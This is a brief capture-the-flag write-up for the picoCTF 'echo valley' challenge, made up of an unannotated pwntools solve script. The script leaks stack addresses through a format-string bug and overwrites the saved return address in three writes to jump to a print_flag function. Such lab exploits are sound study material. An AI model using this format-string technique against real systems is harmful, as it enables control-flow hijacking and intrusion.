echo valley writeup

index
Solve script (too lazy to annotate, but you can try to decipher it if you’d like):
1
import re
2
from pwn import *
3

4
context.log_level = 'debug'
5
context.binary = elf = ELF('./valley')
6
p = remote('shape-facility.picoctf.net', 55728)
7

8
p.recvuntil(b"Try Shouting: \n")
9
p.sendline(b"%20$p.%21$p")
10
res = p.recvline()
11
matches = re.findall(rb'0x[0-9a-fA-F]+', res)
12

13
return_addr_ptr, main_return_addr = matches
14

15
return_addr_ptr = int(return_addr_ptr, 16) - 8
16
main_return_addr = int(main_return_addr, 16)
17

18
print_flag_addr = main_return_addr - 426
19

20
chunks = [
21
    print_flag_addr        & 0xffff,               # lowest 2 bytes
22
    (print_flag_addr >> 16) & 0xffff,              # middle 2 bytes
23
    (print_flag_addr >> 32) & 0xffff,              # upper 2 bytes
24
]
25

26
write_addrs = [
27
    return_addr_ptr,
28
    return_addr_ptr + 2,
29
    return_addr_ptr + 4,
30
]
31

32
p.sendline(fmtstr_payload(offset=6, writes={write_addrs[0]: chunks[0]}))
33
p.recv()
34
p.sendline(fmtstr_payload(offset=6, writes={write_addrs[1]: chunks[1]}))
35
p.recv()
36

37
p.sendline(fmtstr_payload(offset=6, writes={write_addrs[2]: chunks[2]}))
38
p.recv()
39
p.sendline(b'exit')
40

41
p.interactive()